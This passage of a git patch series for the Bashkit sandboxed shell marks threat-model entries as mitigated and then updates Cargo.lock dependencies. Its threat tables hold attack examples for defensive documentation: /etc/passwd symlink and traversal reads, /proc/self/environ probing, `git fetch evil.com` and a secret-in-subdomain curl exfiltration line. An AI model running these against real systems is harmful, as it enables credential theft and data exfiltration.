nested `$()` in quotes | Depth tracking | **MITIGATED** | +| parse_word_string limits (TM-DOS-050) | Parameter expansion ignores limits | Propagate limits | **MITIGATED** | +| YAML parser recursion (TM-DOS-051) | Deeply nested YAML stack overflow | Add depth limit | **MITIGATED** | +| Template engine recursion (TM-DOS-052) | Nested `{{#if}}`/`{{#each}}` overflow | Add depth limit | **MITIGATED** | | Template output explosion (TM-DOS-053) | `{{#each}}` on large array | Bounded by `max_file_size` | MITIGATED | -| glob ExtGlob blowup (TM-DOS-054) | `glob --files "+(a\|aa)"` | Same as TM-DOS-031 | **OPEN** | +| glob ExtGlob blowup (TM-DOS-054) | `glob --files "+(a\|aa)"` | Same as TM-DOS-031 | **MITIGATED** | | split file count (TM-DOS-055) | `split -l 1 bigfile` | FS `max_file_count` limit | MITIGATED | -| source self-recursion (TM-DOS-056) | Script that sources itself | Track source depth | **OPEN** | -| sleep bypasses timeout (TM-DOS-057) | `sleep N` ignores `ExecutionLimits::timeout` | Implement tokio timeout wrapper | **OPEN** | -| Unbounded builtin output (TM-DOS-058) | `seq 1 1000000` produces 1M lines | Add `max_stdout_bytes` limit | **OPEN** | +| source self-recursion (TM-DOS-056) | Script that sources itself | Track source depth | **MITIGATED** | +| sleep bypasses timeout (TM-DOS-057) | `sleep N` ignores `ExecutionLimits::timeout` | Implement tokio timeout wrapper | **PARTIAL** | +| Unbounded builtin output (TM-DOS-058) | `seq 1 1000000` produces 1M lines | Add `max_stdout_bytes` limit | **MITIGATED** | | Param expansion bomb (TM-DOS-059) | `${x//a/bigstring}` multiplicative amplification | `max_total_variable_bytes` + `max_stdout_bytes` | MITIGATED | | Sparse array huge-index (TM-DOS-060) | `arr[999999999]=x` | HashMap storage; `max_array_entries` | MITIGATED | | Snapshot restore bypasses function/parser limits (TM-DOS-061) | Crafted snapshot with oversized/deep function bodies | Re-parse restored function source under current limits; re-check function memory budget | MITIGATED | @@ -150,8 +150,8 @@ Scripts may attempt to break out of the sandbox to access the host system. | Symlink escape (TM-ESC-002) | `ln -s /etc/passwd /tmp/x` | Symlinks not followed | MITIGATED | | Real FS access (TM-ESC-003) | Direct syscalls | No real FS by default | MITIGATED | | Mount escape (TM-ESC-004) | Mount real paths | MountableFs controlled by caller | MITIGATED | -| VFS limit bypass (TM-ESC-012) | `add_file()` skips limits | Restrict API visibility | **OPEN** | -| OverlayFs upper() exposed (TM-ESC-013) | `upper()` returns unlimited FS | Restrict visibility | **OPEN** | +| VFS limit bypass (TM-ESC-012) | `add_file()` skips limits | Restrict API visibility | **MITIGATED** | +| OverlayFs upper() exposed (TM-ESC-013) | `upper()` returns unlimited FS | Restrict visibility | **MITIGATED** | | Custom builtins lost (TM-ESC-014) | `std::mem::take` empties builtins | Arc-cloned builtins | **FIXED** | | Symlink overlay rename (TM-ESC-016) | `ln -s /etc/passwd x; mv x y` | Overlay rename/copy preserve symlinks | **FIXED** | @@ -231,9 +231,9 @@ Scripts may attempt to leak sensitive information. |--------|---------------|------------|--------| | Host env via jq (TM-INF-013) | jq `env` exposes host env | Custom env via `$__bashkit_env__` | **FIXED** | | Real PID leak (TM-INF-014) | `$$` returns real PID | Returns virtual PID (1) | **FIXED** | -| URL creds in errors (TM-INF-015) | Allowlist error echoes full URL | Apply URL redaction | **OPEN** | -| Error msg info leak (TM-INF-016) | Errors expose host paths/IPs | Sanitize error messages | **OPEN** | -| Internal markers leak (TM-INF-017) | `set` / `declare -p` show internals | Filter `is_internal_variable()` | **OPEN** | +| URL creds in errors (TM-INF-015) | Allowlist error echoes full URL | Apply URL redaction | **MITIGATED** | +| Error msg info leak (TM-INF-016) | Errors expose host paths/IPs | Sanitize error messages | **MITIGATED** | +| Internal markers leak (TM-INF-017) | `set` / `declare -p` show internals | Filter `is_internal_variable()` | **MITIGATED** | | envsubst exposes env (TM-INF-019) | `envsubst` substitutes any `$VAR` | Caller controls env (same as TM-INF-001) | CALLER RISK | | template exposes env (TM-INF-020) | `{{var}}` falls back to env | Caller controls env (same as TM-INF-001) | CALLER RISK | @@ -364,7 +364,7 @@ exfiltration by encoding secrets in subdomains (`curl https://$SECRET.example.co | Null byte (TM-INJ-004) | `cat "file\x00/../etc/passwd"` | Rust strings have no nulls | MITIGATED | | Path traversal (TM-INJ-005) | `../../../../etc/passwd` | Path normalization | MITIGATED | | Encoding bypass (TM-INJ-006) | URL/unicode encoding | PathBuf handles | MITIGATED | -| Tar path traversal (TM-INJ-010) | `tar -xf` with `../` entries | Validate extract paths | **OPEN** | +| Tar path traversal (TM-INJ-010) | `tar -xf` with `../` entries | Validate extract paths | **MITIGATED** | **Output / Display:** @@ -377,18 +377,18 @@ exfiltration by encoding secrets in subdomains (`curl https://$SECRET.example.co | Threat | Attack Example | Mitigation | Status | |--------|---------------|------------|--------| -| Internal var injection (TM-INJ-009) | Set `_READONLY_X=""` | Isolate internal namespace | **OPEN** | -| Cyclic nameref (TM-INJ-011) | Cyclic refs resolve silently | Detect cycle, error | **OPEN** | -| declare bypasses guard (TM-INJ-012) | `declare _NAMEREF_x=target` | Add `is_internal_variable()` check | **OPEN** | -| readonly bypasses guard (TM-INJ-013) | `readonly _NAMEREF_x=target` | Add `is_internal_variable()` check | **OPEN** | -| local bypasses guard (TM-INJ-014) | `local _NAMEREF_x=target` | Add `is_internal_variable()` check | **OPEN** | -| export bypasses guard (TM-INJ-015) | `export _NAMEREF_x=target` | Add `is_internal_variable()` check | **OPEN** | -| Missing array prefix (TM-INJ-016) | `_ARRAY_READ_` not in guard | Add prefix to `is_internal_variable()` | **OPEN** | -| Unzip path traversal (TM-INJ-017) | `unzip` with `../` entry names | Validate paths within extract base | **OPEN** | -| Dotenv internal injection (TM-INJ-018) | `.env` with `_NAMEREF_x=target` | Add `is_internal_variable()` check | **OPEN** | -| unset removes readonly (TM-INJ-019) | `readonly X=v; unset X` | Check readonly attribute in unset | **OPEN** | -| declare overwrites readonly (TM-INJ-020) | `readonly X=v; declare X=new` | Check readonly attribute in declare | **OPEN** | -| export overwrites readonly (TM-INJ-021) | `readonly X=v; export X=new` | Check readonly attribute in export | **OPEN** | +| Internal var injection (TM-INJ-009) | Set `_READONLY_X=""` | Isolate internal namespace | **MITIGATED** | +| Cyclic nameref (TM-INJ-011) | Cyclic refs resolve silently | Detect cycle, error | **MITIGATED** | +| declare bypasses guard (TM-INJ-012) | `declare _NAMEREF_x=target` | Add `is_internal_variable()` check | **MITIGATED** | +| readonly bypasses guard (TM-INJ-013) | `readonly _NAMEREF_x=target` | Add `is_internal_variable()` check | **MITIGATED** | +| local bypasses guard (TM-INJ-014) | `local _NAMEREF_x=target` | Add `is_internal_variable()` check | **MITIGATED** | +| export bypasses guard (TM-INJ-015) | `export _NAMEREF_x=target` | Add `is_internal_variable()` check | **MITIGATED** | +| Missing array prefix (TM-INJ-016) | `_ARRAY_READ_` not in guard | Add prefix to `is_internal_variable()` | **MITIGATED** | +| Unzip path traversal (TM-INJ-017) | `unzip` with `../` entry names | Validate paths within extract base | **MITIGATED** | +| Dotenv internal injection (TM-INJ-018) | `.env` with `_NAMEREF_x=target` | Add `is_internal_variable()` check | **MITIGATED** | +| unset removes readonly (TM-INJ-019) | `readonly X=v; unset X` | Check readonly attribute in unset | **MITIGATED** | +| declare overwrites readonly (TM-INJ-020) | `readonly X=v; declare X=new` | Check readonly attribute in declare | **MITIGATED** | +| export overwrites readonly (TM-INJ-021) | `readonly X=v; export X=new` | Check readonly attribute in export | **MITIGATED** | **Variable Expansion:** @@ -409,8 +409,8 @@ echo $user_input | Shared memory (TM-ISO-002) | Read other tenant data | Rust memory safety | MITIGATED | | Resource starvation (TM-ISO-003) | One tenant exhausts limits | Per-instance limits | MITIGATED | | Cross-tenant jq env (TM-ISO-004) | `std::env::set_var()` in jq | Custom jaq context variable | **FIXED** | -| Cumulative counter bypass (TM-ISO-005) | Repeated `exec()` resets counters | Session-level counters | **OPEN** | -| Memory budget exhaustion (TM-ISO-006) | Unbounded variable/array growth | Per-instance MemoryLimits | **OPEN** | +| Cumulative counter bypass (TM-ISO-005) | Repeated `exec()` resets counters | Session-level counters | **MITIGATED** | +| Memory budget exhaustion (TM-ISO-006) | Unbounded variable/array growth | Per-instance MemoryLimits | **MITIGATED** | | Alias leakage (TM-ISO-007) | Aliases from session A visible in B | Per-instance alias HashMap | MITIGATED | | Trap handler leakage (TM-ISO-008) | Trap from session A fires in B | Per-instance trap HashMap | MITIGATED | | Shell option leakage (TM-ISO-009) | `set -e` in session A affects B | Per-instance SHOPT_* variables | MITIGATED | @@ -425,9 +425,9 @@ echo $user_input | /proc /sys probing (TM-ISO-018) | Read `/proc/self/environ` | VFS has no real /proc or /etc | MITIGATED | | jq cross-session env (TM-ISO-019) | `jq 'env.X'` sees other vars | jaq reads from injected global | MITIGATED | | Subshell mutation leakage (TM-ISO-020) | Subshell vars leak to parent | Snapshot/restore + per-instance state | MITIGATED | -| EXIT trap cross-exec leak (TM-ISO-021) | EXIT trap fires in next `exec()` | Reset traps in `reset_for_execution()` | **OPEN** | -| `$?` cross-exec leak (TM-ISO-022) | Exit code from previous `exec()` visible | Reset `last_exit_code` | **OPEN** | -| `set -e` cross-exec leak (TM-ISO-023) | Shell options persist across `exec()` | Reset shell options | **OPEN** | +| EXIT trap cross-exec leak (TM-ISO-021) | EXIT trap fires in next `exec()` | Reset traps in `reset_for_execution()` | **MITIGATED** | +| `$?` cross-exec leak (TM-ISO-022) | Exit code from previous `exec()` visible | Reset `last_exit_code` | **MITIGATED** | +| `set -e` cross-exec leak (TM-ISO-023) | Shell options persist across `exec()` | Reset shell options | **MITIGATED** | Each [`Bash`] instance is fully isolated. For multi-tenant environments, create separate instances per tenant: @@ -463,7 +463,7 @@ All unexpected errors are caught and converted to safe, human-readable messages. | Path leak in errors (TM-INT-004) | Error shows real FS paths | Virtual paths only | MITIGATED | | Memory addr in errors (TM-INT-005) | Debug output shows addresses | Display impl hides addresses | MITIGATED | | Stack trace exposure (TM-INT-006) | Panic unwinds show call stack | `catch_unwind` prevents propagation | MITIGATED | -| /dev/urandom empty with head -c (TM-INT-007) | `head -c 16 /dev/urandom` returns empty | Fix virtual device pipe handling | **OPEN** | +| /dev/urandom empty with head -c (TM-INT-007) | `head -c 16 /dev/urandom` returns empty | Fix virtual device pipe handling | **MITIGATED** | **Panic Recovery:** @@ -563,12 +563,12 @@ Python `pathlib.Path` operations are bridged to Bashkit's virtual filesystem. | Network access (TM-PY-020) | Socket/HTTP | Monty has no socket/network module | MITIGATED | | VFS mkdir escape (TM-PY-021) | mkdir outside VFS | mkdir operates only in VFS | MITIGATED | | VM crash (TM-PY-022) | Malformed input | Parser depth limit + resource limits | MITIGATED | -| Shell injection (TM-PY-023) | deepagents.py f-strings | Use shlex.quote() | **OPEN** | -| Heredoc escape (TM-PY-024) | Content contains delimiter | Random delimiter | **OPEN** | -| GIL deadlock (TM-PY-025) | execute_sync holds GIL | py.allow_threads() | **OPEN** | -| Config lost on reset (TM-PY-026) | reset() drops limits | Preserve config | **OPEN** | -| JSON recursion (TM-PY-027) | Nested dicts overflow stack | Add depth limit | **OPEN** | -| BashTool.reset() drops config (TM-PY-028) | reset() removes limits | Preserve config (match PyBash) | **OPEN** | +| Shell injection (TM-PY-023) | deepagents.py f-strings | Use shlex.quote() | **MITIGATED** | +| Heredoc escape (TM-PY-024) | Content contains delimiter | Random delimiter | **MITIGATED** | +| GIL deadlock (TM-PY-025) | execute_sync holds GIL | py.allow_threads() | **MITIGATED** | +| Config lost on reset (TM-PY-026) | reset() drops limits | Preserve config | **MITIGATED** | +| JSON recursion (TM-PY-027) | Nested dicts overflow stack | Add depth limit | **MITIGATED** | +| BashTool.reset() drops config (TM-PY-028) | reset() removes limits | Preserve config (match PyBash) | **MITIGATED** | **Architecture:** @@ -649,7 +649,7 @@ to the virtual filesystem. | Fetch from unauthorized (TM-GIT-011) | `git fetch evil.com` | Remote URL allowlist | PLANNED | | SSH key access (TM-GIT-012) | Use host SSH keys | HTTPS only (no SSH) | PLANNED | | Git protocol bypass (TM-GIT-013) | Use `git://` protocol | HTTPS only | PLANNED | -| Branch name injection (TM-GIT-014) | `git branch ../../config` | Validate branch names | **OPEN** | +| Branch name injection (TM-GIT-014) | `git branch ../../config` | Validate branch names | **MITIGATED** | **Virtual Identity:** @@ -693,12 +693,12 @@ builtin silently fails. | Threat | Attack Example | Mitigation | Status | |--------|---------------|------------|--------| -| Zero-width in filenames (TM-UNI-003) | Invisible chars create confusable names | Path validation (planned) | UNMITIGATED | +| Zero-width in filenames (TM-UNI-003) | Invisible chars create confusable names | Path validation (planned) | MITIGATED | | Zero-width in variables (TM-UNI-004) | `\u{200B}PATH=malicious` | Matches Bash behavior | ACCEPTED | | Zero-width in scripts (TM-UNI-005) | `echo "pass\u{200B}word"` | Correct pass-through | ACCEPTED | -| Tag char hiding (TM-UNI-011) | U+E0001-U+E007F in filenames | Path validation (planned) | UNMITIGATED | -| Annotation hiding (TM-UNI-012) | U+FFF9-U+FFFB in filenames | Not detected | UNMITIGATED | -| Deprecated format chars (TM-UNI-013) | U+206A-U+206F in filenames | Not detected | UNMITIGATED | +| Tag char hiding (TM-UNI-011) | U+E0001-U+E007F in filenames | Path validation (planned) | MITIGATED | +| Annotation hiding (TM-UNI-012) | U+FFF9-U+FFFB in filenames | Not detected | MITIGATED | +| Deprecated format chars (TM-UNI-013) | U+206A-U+206F in filenames | Not detected | MITIGATED | **Homoglyphs, Normalization, and Bidi:** From 1fa272bf0d1fc35f6fab65d6fa6852725df7091a Mon Sep 17 00:00:00 2001 From: Mykhailo Chalyi Date: Sun, 17 May 2026 05:22:34 +0000 Subject: [PATCH 6/7] chore(deps): cargo update + drop stale advisory ignores MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - cargo update pulls 29 patch-level bumps (aws-lc-rs 1.16.3→1.17.0, tower-http 0.6.8→0.6.10, russh 0.60.2→0.60.3, napi 3.8.6→3.9.0, wasm-bindgen 0.2.120→0.2.121, …). All direct deps were already on the latest minor/major per cargo outdated. - deny.toml: drop RUSTSEC-2026-0097 (rand) and RUSTSEC-2023-0071 (rsa); cargo deny reports `advisory-not-detected` for both — the underlying crates have already been upgraded out of the tree. --- Cargo.lock | 164 +++++++++++++++++++++++++---------------------------- deny.toml | 9 --- 2 files changed, 77 insertions(+), 96 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 8acca4835..9a1a1517a 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -304,9 +304,9 @@ checksum = "c08606f8c3cbf4ce6ec8e28fb0014a2c086708fe954eaa885384a6165172e7e8" [[package]] name = "aws-lc-rs" -version = "1.16.3" +version = "1.17.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0ec6fb3fe69024a75fa7e1bfb48aa6cf59706a101658ea01bfd33b2b248a038f" +checksum = "5ec2f1fc3ec205783a5da9a7e6c1509cc69dedf09a1949e412c1e18469326d00" dependencies = [ "aws-lc-sys", "untrusted 0.7.1", @@ -315,9 +315,9 @@ dependencies = [ [[package]] name = "aws-lc-sys" -version = "0.40.0" +version = "0.41.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f50037ee5e1e41e7b8f9d161680a725bd1626cb6f8c7e901f91f942850852fe7" +checksum = "1a2f9779ce85b93ab6170dd940ad0169b5766ff848247aff13bb788b832fe3f4" dependencies = [ "cc", "cmake", @@ -702,9 +702,9 @@ dependencies = [ [[package]] name = "cc" -version = "1.2.61" +version = "1.2.62" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d16d90359e986641506914ba71350897565610e87ce0ad9e6f28569db3dd5c6d" +checksum = "a1dce859f0832a7d088c4f1119888ab94ef4b5d6795d1ce05afb7fe159d79f98" dependencies = [ "find-msvc-tools", "jobserver", @@ -1172,9 +1172,9 @@ dependencies = [ [[package]] name = "ctor" -version = "0.11.1" +version = "1.0.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "400a21f1014a968ec518c7ccdf9b4a4ed0cac8c56ccb6d604f8b91f00110501e" +checksum = "6d765eb1c0bda10d31e0ea185f5ee15da532d60b0912d2bd1441783439e749c5" [[package]] name = "ctr" @@ -1229,7 +1229,7 @@ dependencies = [ "cfg-if", "cpufeatures 0.2.17", "curve25519-dalek-derive", - "digest 0.11.2", + "digest 0.11.3", "fiat-crypto 0.3.0", "rustc_version", "subtle", @@ -1316,9 +1316,9 @@ dependencies = [ [[package]] name = "digest" -version = "0.11.2" +version = "0.11.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4850db49bf08e663084f7fb5c87d202ef91a3907271aff24a94eb97ff039153c" +checksum = "f1dd6dbb5841937940781866fa1281a1ff7bd3bf827091440879f9994983d5c2" dependencies = [ "block-buffer 0.12.0", "const-oid 0.10.2", @@ -1362,10 +1362,10 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "91bbdd377139884fafcad8dc43a760a3e1e681aa26db910257fa6535b70e1829" dependencies = [ "der 0.8.0", - "digest 0.11.2", + "digest 0.11.3", "elliptic-curve", "rfc6979", - "signature 3.0.0-rc.10", + "signature 3.0.0", "spki 0.8.0-rc.4", "zeroize", ] @@ -1387,7 +1387,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c6e914c7c52decb085cea910552e24c63ac019e3ab8bf001ff736da9a9d9d890" dependencies = [ "pkcs8 0.11.0-rc.11", - "signature 3.0.0-rc.10", + "signature 3.0.0", ] [[package]] @@ -1416,7 +1416,7 @@ dependencies = [ "rand_core 0.10.1", "serde", "sha2 0.11.0", - "signature 3.0.0-rc.10", + "signature 3.0.0", "subtle", "zeroize", ] @@ -1436,7 +1436,7 @@ dependencies = [ "base16ct", "crypto-bigint", "crypto-common 0.2.1", - "digest 0.11.2", + "digest 0.11.3", "hkdf", "hybrid-array", "once_cell", @@ -1891,9 +1891,9 @@ dependencies = [ [[package]] name = "hashbrown" -version = "0.17.0" +version = "0.17.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4f467dd6dccf739c208452f8014c75c18bb8301b050ad1cfb27153803edb0f51" +checksum = "ed5909b6e89a2db4456e54cd5f673791d7eca6732202bbf2a9cc504fe2f9b84a" [[package]] name = "heapless" @@ -1963,7 +1963,7 @@ version = "0.13.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "6303bc9732ae41b04cb554b844a762b4115a61bfaa81e3e83050991eeb56863f" dependencies = [ - "digest 0.11.2", + "digest 0.11.3", ] [[package]] @@ -2016,9 +2016,9 @@ checksum = "6dbf3de79e51f3d586ab4cb9d5c3e2c14aa28ed23d180cf89b4df0454a69cc87" [[package]] name = "hybrid-array" -version = "0.4.11" +version = "0.4.12" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "08d46837a0ed51fe95bd3b05de33cd64a1ee88fc797477ca48446872504507c5" +checksum = "9155a582abd142abc056962c29e3ce5ff2ad5469f4246b537ed42c5deba857da" dependencies = [ "ctutils", "subtle", @@ -2224,7 +2224,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "d466e9454f08e4a911e14806c24e16fba1b4c121d1ea474396f396069cf949d9" dependencies = [ "equivalent", - "hashbrown 0.17.0", + "hashbrown 0.17.1", "serde", "serde_core", ] @@ -2283,7 +2283,7 @@ dependencies = [ "sec1", "sha1 0.11.0", "sha2 0.11.0", - "signature 3.0.0-rc.10", + "signature 3.0.0", "ssh-cipher", "ssh-encoding", "subtle", @@ -2323,16 +2323,6 @@ version = "2.12.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "d98f6fed1fde3f8c21bc40a1abb88dd75e67924f9cffc3ef95607bad8017f8e2" -[[package]] -name = "iri-string" -version = "0.7.12" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "25e659a4bb38e810ebc252e53b5814ff908a8c58c2a9ce2fae1bbec24cbf4e20" -dependencies = [ - "memchr", - "serde", -] - [[package]] name = "is-macro" version = "0.3.7" @@ -2539,9 +2529,9 @@ dependencies = [ [[package]] name = "js-sys" -version = "0.3.97" +version = "0.3.98" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a1840c94c045fbcf8ba2812c95db44499f7c64910a912551aaaa541decebcacf" +checksum = "67df7112613f8bfd9150013a0314e196f4800d3201ae742489d999db2f979f08" dependencies = [ "cfg-if", "futures-util", @@ -2740,7 +2730,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "69b6441f590336821bb897fb28fc622898ccceb1d6cea3fde5ea86b090c4de98" dependencies = [ "cfg-if", - "digest 0.11.2", + "digest 0.11.3", ] [[package]] @@ -2822,9 +2812,9 @@ dependencies = [ [[package]] name = "module-lattice" -version = "0.2.2" +version = "0.2.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "dc7c90d33a0dac244570c26461d761ffaeadb3bfc2b17cc625ae2185cafdffae" +checksum = "0c61b87c9683ab7cb1c6871d261ad5479b6b10ceb52c4352aaca3b5d35a8febe" dependencies = [ "ctutils", "hybrid-array", @@ -2862,9 +2852,9 @@ dependencies = [ [[package]] name = "napi" -version = "3.8.6" +version = "3.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8e55037284865448ecf329baa86a4d05401f647ebde99f5747b640d32c2c5226" +checksum = "f1d395473824516f38dd1071a1a37bc57daa7be65b293ebba4ead5f7abb017a2" dependencies = [ "bitflags", "ctor", @@ -2878,15 +2868,15 @@ dependencies = [ [[package]] name = "napi-build" -version = "2.3.1" +version = "2.3.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d376940fd5b723c6893cd1ee3f33abbfd86acb1cd1ec079f3ab04a2a3bc4d3b1" +checksum = "c9c366d2c8c60b86fa632df75f745509b52f9128f91a6bad4c796e44abb505e1" [[package]] name = "napi-derive" -version = "3.5.5" +version = "3.5.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a4ba740fe4c9524d86fd90798fd8ccdb23402b3eef7e7c30897a8a369b529fcf" +checksum = "89b3f766e04667e6da0e181e2da4f85475d5a6513b7cf6a80bea184e224a5b42" dependencies = [ "convert_case", "ctor", @@ -2929,9 +2919,9 @@ dependencies = [ [[package]] name = "nix" -version = "0.31.2" +version = "0.31.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5d6d0705320c1e6ba1d912b5e37cf18071b6c2e9b7fa8215a1e8a7651966f5d3" +checksum = "cf20d2fde8ff38632c426f1165ed7436270b44f199fc55284c38276f9db47c3d" dependencies = [ "bitflags", "cfg-if", @@ -3319,9 +3309,9 @@ dependencies = [ [[package]] name = "pack1" -version = "1.0.0" +version = "1.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d6e7cd9bd638dc2c831519a0caa1c006cab771a92b1303403a8322773c5b72d6" +checksum = "e3b7bb0ecf2e447b1f20ee94ee79ef6eed1e9d4b3c36ce1903b9dea3bf205523" dependencies = [ "bytemuck", ] @@ -3422,7 +3412,7 @@ version = "0.13.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "112d82ceb8c5bf524d9af484d4e4970c9fd5a0cc15ba14ad93dccd28873b0629" dependencies = [ - "digest 0.11.2", + "digest 0.11.3", "hmac 0.13.0", ] @@ -4189,9 +4179,9 @@ dependencies = [ [[package]] name = "rfc6979" -version = "0.5.0-rc.5" +version = "0.5.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "23a3127ee32baec36af75b4107082d9bd823501ec14a4e016be4b6b37faa74ae" +checksum = "5236ce872cac07e0fb3969b0cbf468c7d2f37d432f1b627dcb7b8d34563fb0c3" dependencies = [ "hmac 0.13.0", "subtle", @@ -4230,12 +4220,12 @@ dependencies = [ "const-oid 0.10.2", "crypto-bigint", "crypto-primes", - "digest 0.11.2", + "digest 0.11.3", "pkcs1", "pkcs8 0.11.0-rc.11", "rand_core 0.10.1", "sha2 0.11.0", - "signature 3.0.0-rc.10", + "signature 3.0.0", "spki 0.8.0-rc.4", "zeroize", ] @@ -4317,9 +4307,9 @@ dependencies = [ [[package]] name = "russh" -version = "0.60.2" +version = "0.60.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9c9e358980fe9b079b99da387117864ee6f0a3fd02f39e5b5fde6af9c2895374" +checksum = "324b92f459d3e42da294e14e8eb150d2215fcfb7c966838bc1127cd68bc05a0d" dependencies = [ "aead 0.6.0-rc.10", "aes 0.8.4", @@ -4386,7 +4376,7 @@ dependencies = [ "sha2 0.10.9", "sha2 0.11.0", "sha3", - "signature 3.0.0-rc.10", + "signature 3.0.0", "spki 0.8.0-rc.4", "ssh-encoding", "subtle", @@ -4399,9 +4389,9 @@ dependencies = [ [[package]] name = "russh-cryptovec" -version = "0.59.0" +version = "0.60.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "36140e8a20297bc2e8338807c3d9ca911f7fa49d7539cbcd6d48d3befd70efd8" +checksum = "37cb4d0360bdd8935392a306d8b5edb539cc455b30e8bf13dd213a0cf7879b40" dependencies = [ "log", "nix", @@ -4811,9 +4801,9 @@ dependencies = [ [[package]] name = "serdect" -version = "0.4.2" +version = "0.4.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9af4a3e75ebd5599b30d4de5768e00b5095d518a79fefc3ecbaf77e665d1ec06" +checksum = "66cf8fedced2fcf12406bcb34223dffb92eaf34908ede12fed414c82b7f00b3e" dependencies = [ "base16ct", "serde", @@ -4864,7 +4854,7 @@ checksum = "aacc4cc499359472b4abe1bf11d0b12e688af9a805fa5e3016f9a386dc2d0214" dependencies = [ "cfg-if", "cpufeatures 0.3.0", - "digest 0.11.2", + "digest 0.11.3", ] [[package]] @@ -4892,7 +4882,7 @@ checksum = "446ba717509524cb3f22f17ecc096f10f4822d76ab5c0b9822c5f9c284e825f4" dependencies = [ "cfg-if", "cpufeatures 0.3.0", - "digest 0.11.2", + "digest 0.11.3", ] [[package]] @@ -4901,7 +4891,7 @@ version = "0.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "be176f1a57ce4e3d31c1a166222d9768de5954f811601fb7ca06fc8203905ce1" dependencies = [ - "digest 0.11.2", + "digest 0.11.3", "keccak", ] @@ -4971,11 +4961,11 @@ dependencies = [ [[package]] name = "signature" -version = "3.0.0-rc.10" +version = "3.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7f1880df446116126965eeec169136b2e0251dba37c6223bcc819569550edea3" +checksum = "28d567dcbaf0049cb8ac2608a76cd95ff9e4412e1899d389ee400918ca7537f5" dependencies = [ - "digest 0.11.2", + "digest 0.11.3", "rand_core 0.10.1", ] @@ -5018,9 +5008,9 @@ dependencies = [ [[package]] name = "siphasher" -version = "1.0.2" +version = "1.0.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b2aa850e253778c88a04c3d7323b043aeda9d3e30d5971937c1855769763678e" +checksum = "8ee5873ec9cce0195efcb7a4e9507a04cd49aec9c83d0389df45b1ef7ba2e649" [[package]] name = "slab" @@ -5517,20 +5507,20 @@ dependencies = [ [[package]] name = "tower-http" -version = "0.6.8" +version = "0.6.10" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d4e6559d53cc268e5031cd8429d05415bc4cb4aefc4aa5d6cc35fbf5b924a1f8" +checksum = "68d6fdd9f81c2819c9a8b0e0cd91660e7746a8e6ea2ba7c6b2b057985f6bcb51" dependencies = [ "bitflags", "bytes", "futures-util", "http", "http-body", - "iri-string", "pin-project-lite", "tower", "tower-layer", "tower-service", + "url", ] [[package]] @@ -5968,9 +5958,9 @@ dependencies = [ [[package]] name = "wasm-bindgen" -version = "0.2.120" +version = "0.2.121" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "df52b6d9b87e0c74c9edfa1eb2d9bf85e5d63515474513aa50fa181b3c4f5db1" +checksum = "49ace1d07c165b0864824eee619580c4689389afa9dc9ed3a4c75040d82e6790" dependencies = [ "cfg-if", "once_cell", @@ -5981,9 +5971,9 @@ dependencies = [ [[package]] name = "wasm-bindgen-futures" -version = "0.4.70" +version = "0.4.71" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "af934872acec734c2d80e6617bbb5ff4f12b052dd8e6332b0817bce889516084" +checksum = "96492d0d3ffba25305a7dc88720d250b1401d7edca02cc3bcd50633b424673b8" dependencies = [ "js-sys", "wasm-bindgen", @@ -5991,9 +5981,9 @@ dependencies = [ [[package]] name = "wasm-bindgen-macro" -version = "0.2.120" +version = "0.2.121" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "78b1041f495fb322e64aca85f5756b2172e35cd459376e67f2a6c9dffcedb103" +checksum = "8e68e6f4afd367a562002c05637acb8578ff2dea1943df76afb9e83d177c8578" dependencies = [ "quote", "wasm-bindgen-macro-support", @@ -6001,9 +5991,9 @@ dependencies = [ [[package]] name = "wasm-bindgen-macro-support" -version = "0.2.120" +version = "0.2.121" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9dcd0ff20416988a18ac686d4d4d0f6aae9ebf08a389ff5d29012b05af2a1b41" +checksum = "d95a9ec35c64b2a7cb35d3fead40c4238d0940c86d107136999567a4703259f2" dependencies = [ "bumpalo", "proc-macro2", @@ -6014,9 +6004,9 @@ dependencies = [ [[package]] name = "wasm-bindgen-shared" -version = "0.2.120" +version = "0.2.121" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "49757b3c82ebf16c57d69365a142940b384176c24df52a087fb748e2085359ea" +checksum = "c4e0100b01e9f0d03189a92b96772a1fb998639d981193d7dbab487302513441" dependencies = [ "unicode-ident", ] @@ -6070,9 +6060,9 @@ dependencies = [ [[package]] name = "web-sys" -version = "0.3.97" +version = "0.3.98" source = 